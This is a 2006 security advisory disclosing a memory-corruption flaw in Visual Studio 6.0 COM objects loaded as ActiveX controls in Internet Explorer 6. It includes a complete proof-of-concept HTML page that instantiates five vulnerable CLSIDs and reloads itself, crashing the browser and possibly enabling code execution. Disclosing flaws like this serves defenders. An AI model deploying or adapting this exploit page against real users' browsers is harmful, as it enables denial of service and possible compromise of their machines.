Advisory ID: XSec-06-07 Advisory Name: Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability Release Date: 08/18/2006 Tested on: Visual Studio 6.0/Internet Explorer 6.0 SP1 Affected version: Visual Studio 6.0 Author: nop <nop#xsec.org> http://www.xsec.org Overview: Multiple vulnerability has been found in Visual Studio 6.0 \ When Internet Explorer tries to instantiate the TCPROPS.DLL, \ FP30WEC.DLL,mdt2db.dll,mdt2qd.dll,VI30AUT.DLL (Visual Stuido \ 6.0) COM object as an ActiveX control, it may corrupt system \ memory in such a way that an attacker may DoS and possibly \ could execute arbitrary code. Exploit: =============== vs6.htm start ================ <!-- // Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000/2003 // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92} // Info: FpFile Class// ProgID: WECAPI.FpFile.1 // InprocServer32: C:\WINDOWS\System\FP30WEC.DLL // CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60} // Info: TCExtPage Class // InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL // CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8} // Info: FpaFile Class// ProgID: FpaFile.FpaFile.1 // InprocServer32: C:\WINDOWS\system\VI30AUT.DLL // CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739} // Info: Microsoft Data Tools Query Designer// ProgID: MSDTQueryDesigner2 // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2qd.dll // CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739} // Info: Microsoft Data Tools Database Designer// ProgID: MSDTDatabaseDesigner2 // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2db.dll --!> <html><body> <object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object> <object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object> <object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object> <object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object> <object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object> <!-- </body> <script>location.reload();</script> </html> =============== vs6.htm end ================== Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15 About XSec: We are redhat.
